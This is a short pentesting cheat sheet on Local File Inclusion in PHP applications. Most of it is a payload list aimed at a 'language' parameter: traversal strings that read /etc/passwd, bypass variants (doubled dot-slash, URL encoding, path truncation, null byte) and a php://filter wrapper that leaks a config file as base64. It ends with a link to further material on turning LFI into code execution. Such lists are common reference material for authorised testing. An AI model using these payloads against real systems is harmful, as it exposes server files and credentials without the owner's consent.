LFI
an attacker may manipulate these parameters to display the content of any local file on the hosting server, leading to a Local File Inclusion (LFI) vulnerability.
Wordlists
Basic payloads
# Basic LFI
/index.php?language=/etc/passwd
# Path traversal
/index.php?language=../../../../etc/passwd
# Name prefix
/index.php?language=/../../../etc/passwd
# Appproved Path
/index.php?language=./languages/../../../../etc/passwd
Bypasses
# Basic bypass
/index.php?language=....//....//....//....//etc/passwd
# URL encoded
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
# Appended extension
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]
# Null byte
/index.php?language=../../../../etc/passwd%00
# Read base64 with php filter
/index.php?language=php://filter/read=convert.base64-encode/resource=config
PHP wrappers
For more wrappers:
https://www.thehacker.recipes/web/inputs/file-inclusion/lfi-to-rce/php-wrappers-and-streams
Last updated
Was this helpful?